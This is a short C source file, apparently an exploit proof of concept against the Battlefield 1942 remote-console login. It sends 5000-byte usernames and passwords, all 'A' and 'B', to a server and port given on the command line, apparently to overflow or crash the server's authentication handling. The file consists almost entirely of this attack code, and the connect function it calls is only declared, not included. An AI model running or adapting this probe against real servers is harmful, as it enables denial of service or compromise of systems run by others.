
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;
 int EX_USAGE ;
 int bf1942_rcon_connect (char*,int ,char*,char*,int*) ;
 int close (int) ;
 char* malloc (int) ;
 int memset (char*,char,int) ;
 int printf (char*,char*,...) ;
 char* strerror (int) ;
 int strtol (char*,int *,int) ;

int main(int argc, char **argv)
{
   int sock, rval=0;
   char *user, *pass;
   int anz=5000 ;
   if(argc!=3)
   {
      printf("Usage: %s servername serverport\n\n",argv[0]);
      return EX_USAGE;
   }
   user=malloc(anz+1);
   pass=malloc(anz+1);
   memset(user,0,anz+1);
   memset(user,'A',anz);
   memset(pass,0,anz+1);
   memset(pass,'B',anz);
   do
   {

rval=bf1942_rcon_connect(argv[1],strtol(argv[2],((void*)0),10),user,pass,&sock);
      if(rval==-1)
      {
         printf("Authentication failed. user=%s pass=%s\n",user,pass);
  user[1]++;
         close(sock);
      }
      else if(rval>0)
      {
         printf("Error: %s\n",strerror(rval));
         return -1;
      }
   } while(0);
   return 0;
}
